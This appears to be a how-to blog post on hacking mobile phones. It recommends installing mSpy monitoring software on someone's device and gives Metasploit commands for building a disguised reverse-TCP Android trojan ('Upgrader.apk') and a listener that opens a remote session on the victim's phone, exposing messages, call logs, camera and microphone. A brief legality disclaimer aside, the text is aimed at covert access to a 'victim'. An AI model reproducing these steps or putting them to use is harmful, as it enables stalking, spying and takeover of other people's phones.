Want to know how to hack mobile phone? well, this is the most common query in the branch of hacking. As a guardian, you might need to do so or there may be other reasons. In, this post you will learn about the rumors and the reality on how to hack mobile phone.
Is it possible to hack a mobile phone?
Yes, it is possible to hack a mobile phone. For doing so there are different methods using which both ANDROID and IOS device can be hacked.
My reccomendation is don’t do anything illegal that is against the law. Always follow the law and only perform hacking with permission or if you are a goverment cyber security expert trying to catch criminals.
What are the different methods to hack a mobile phone?
These applications provide you with a good interface and easy to use features. Some of them are paid and some are free applications, paid applications will provide you with better and more features.
- Register on mspy.org there it will ask you some information enter all the information and continue.
- Follow the installation guide which will tell you how to install mspy application in android/ios device.
-> Creating a payload using Metasploit, that can be either directly send to the victim or can be bound with some other application.
This method is for android phone only! For this, you will need kali linux Operating system and some skills.
- Open up your kali linux, now if you don’t know how to download and install kali linux then click here.
- Open a terminal, and make an apk
- You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=enter your ip R > /root/Upgrader.apk
This will only work if the victim is in your LAN i.e if the victim is connected to the same wifi network as of yours. For hacking in WAN i.e outside the LAN just enter your Public ip address.
- Open another terminal until the file is being produced.
- Load metasploit console, by typing: msfconsole
- Now setup a listener by typing use exploit/multi/handler
- Set up a reverse payload by typing: set payload android/meterpreter/reverse_tcp
- To set L host type: set LHOST your ip address (Do not enter public ip)
- Now type the last command exploit
Now your listener is ready and it’s time to install the apk in victim’s phone.
After installing the apk you will be able to get all the information like messages, call logs, and even you will be able to access camera microphone ETC.
If you want to know how to bind your trojan apk into some other apk let me know in the comment section.